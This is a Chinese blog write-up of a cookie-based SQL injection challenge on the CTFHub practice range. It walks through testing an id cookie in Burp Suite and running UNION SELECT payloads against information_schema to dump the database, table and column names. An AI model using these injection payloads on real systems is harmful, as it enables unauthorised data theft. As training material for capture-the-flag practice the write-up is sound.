cookie注入(CTFHUB靶场)

本文介绍了Cookie注入的原理,即通过修改本地Cookie来执行非法操作。讲解了注入点判断、字段数探测、数据库爆破等步骤,以实际示例展示了如何利用工具进行测试。同时,强调了因程序员未对Cookie内容过滤导致的安全风险,并提醒开发者加强防护措施。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

cookie注入的原理:

更改本地的cookie,从而利用cookie来提交非法语句

为什么会产生cookie?

可能是因为程序员没有在cookie中做一些过滤。

cookie注入的流程:

1.先判断有没有注入点。

2.用order by函数来得到字段的总数

3.知道了字段数,我们就可以开始爆破了

4.爆破表明

5.爆破列明

6.得到flag

注入的流程:

我们先用BP对靶场进行抓包,然后将抓到的数据发送到repeater

8c6756d450bf4b95b61b34c4a49d2349.png

因为是cookie注入,所以我们就把注意放在cookie上,发现cookie后面有一个id=1,我们加一个单引号,看看会不会报错

id=1'

5142b331170f95ba2bc0ed6a89b5c16d.png

 

发现报错,存在注入,我们可以查看一下他的字段数,发现等于3的时候会报错,说明字段数等于二,然后我们可以开始暴库了

id=-a union select 1,database()

71cebdb59275ec8600e4637e23b447c9.png

得到数据库为sqli,然后开始爆表

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

b3b53df2baf6d1b6a5d0ef37c36fe8ae.png

尝试一下用gagawesmtx这个表

继续爆字段

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='你的表名'

73cb53207366a2cb2b3e65a091ac1607.png

最终得到flag

5cd27c649379b291d3840cfa5765589e.png

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值